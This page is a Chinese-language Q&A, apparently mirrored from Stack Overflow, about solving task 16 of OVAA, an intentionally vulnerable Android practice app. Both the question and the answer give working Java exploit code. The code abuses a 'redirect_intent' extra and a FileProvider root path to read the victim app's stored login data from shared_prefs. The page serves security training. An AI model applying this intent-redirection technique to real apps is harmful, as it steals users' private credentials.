【问题标题】:Leaking data with android Content Provider with implicit intent使用具有隐式意图的 android Content Provider 泄漏数据
【发布时间】:2020-11-01 00:59:37
【问题描述】:

有一个易受攻击的应用程序来练习 Android 安全性。 Link Here 我被困在它的第 16 个任务中。

16.在根条目中为 oversecured.ovaa.fileprovider 内容提供程序使用非常广泛的文件共享声明。

我努力解决它但仍然无法解决。这是我的代码

MainActivity.Java

public class MainActivity extends AppCompatActivity {

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);

       Intent extra = new Intent(Intent.ACTION_VIEW);
        extra.setFlags(Intent.FLAG_GRANT_READ_URI_PERMISSION );
        extra.setClassName(getPackageName(), "com.exploit.app.LeakActivity");
        extra.setType("text/xml");
        extra.setData(Uri.parse("content://oversecured.ovaa.fileprovider/root/data/data/oversecured.ovaa/shared_prefs/login_data.xml"));

        Intent intent = new Intent();
        intent.setClassName("oversecured.ovaa", "oversecured.ovaa.activities.LoginActivity");
        intent.putExtra("redirect_intent", extra);
        startActivity(intent);
    }
}

LeakActivity.java

public class LeakActivity extends MainActivity {
        InputStream i = getContentResolver().openInputStream(getIntent().getData()); 

    public LeakActivity() throws FileNotFoundException {
    }
}

AndroidManifest.xml

    <activity android:name=".MainActivity">
        <intent-filter>
            <action android:name="android.intent.action.MAIN" />
            <category android:name="android.intent.category.LAUNCHER" />
        </intent-filter>
    </activity>
    <activity android:name=".LeakActivity" />

谢谢

【问题讨论】:

    标签: android android-studio debugging android-fragments android-security


    【解决方案1】:

    我已验证,确认以下提供的代码对我有用:

    MainActivity.java

    public class MainActivity extends AppCompatActivity {
    private Button button;
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);
        button = (Button) findViewById(R.id.button);
        button.setOnClickListener(new View.OnClickListener(){
            @Override
            public void onClick(View v){
                Intent extra = new Intent();
                extra.setFlags(Intent.FLAG_GRANT_PERSISTABLE_URI_PERMISSION
                        | Intent.FLAG_GRANT_PREFIX_URI_PERMISSION
                        | Intent.FLAG_GRANT_READ_URI_PERMISSION
                        | Intent.FLAG_GRANT_WRITE_URI_PERMISSION);
                extra.setClassName(getPackageName(), "com.example.fileleaker.Leaker");
                extra.setData(Uri.parse("content://oversecured.ovaa.fileprovider/"));
    
                Intent intent = new Intent();
                intent.setClassName("oversecured.ovaa", "oversecured.ovaa.activities.LoginActivity");
                intent.putExtra("redirect_intent", extra);
                startActivity(intent);
            }
        });
      }
    }
    

    Leaker.java

    public class Leaker extends AppCompatActivity {
        @Override
        protected void onCreate(Bundle savedInstanceState) {
            super.onCreate(savedInstanceState);
            setContentView(R.layout.activity_leaker);
    
            Uri uri = Uri.parse(getIntent().getDataString() + "root/data/data/oversecured.ovaa/shared_prefs/login_data.xml"); // content://com.victim.provider/image/1
    
            try {
                InputStream i = getContentResolver().openInputStream(uri); // stolen image
                //creating an InputStreamReader object
                InputStreamReader isReader = new InputStreamReader(i);
                //Creating a BufferedReader object
                BufferedReader reader = new BufferedReader(isReader);
                StringBuffer sb = new StringBuffer();
                String str;
                while((str = reader.readLine())!= null){
                    Log.v("Hello","=======File__DATA======="+str+"==========");
                }
            }catch (FileNotFoundException e) {
                e.printStackTrace();
            } catch (IOException e) {
                e.printStackTrace();
            }
        }
    }
    

    AndroidManifest.xml

    <activity android:name=".Leaker">
        <intent-filter>
            <action android:name="android.intent.action.MAIN" />
        </intent-filter>
    </activity>
    <activity android:name=".MainActivity">
        <intent-filter>
            <action android:name="android.intent.action.MAIN" />
            <category android:name="android.intent.category.LAUNCHER" />
        </intent-filter>
    </activity>
    

    通过https://www.facebook.com/zenodermus.javanicus与我联系

    【讨论】:

      猜你喜欢
      • 1970-01-01
      • 1970-01-01
      • 2017-05-19
      • 1970-01-01
      • 2012-10-03
      • 1970-01-01
      • 1970-01-01
      • 2016-07-19
      • 2020-12-13
      相关资源
      最近更新 更多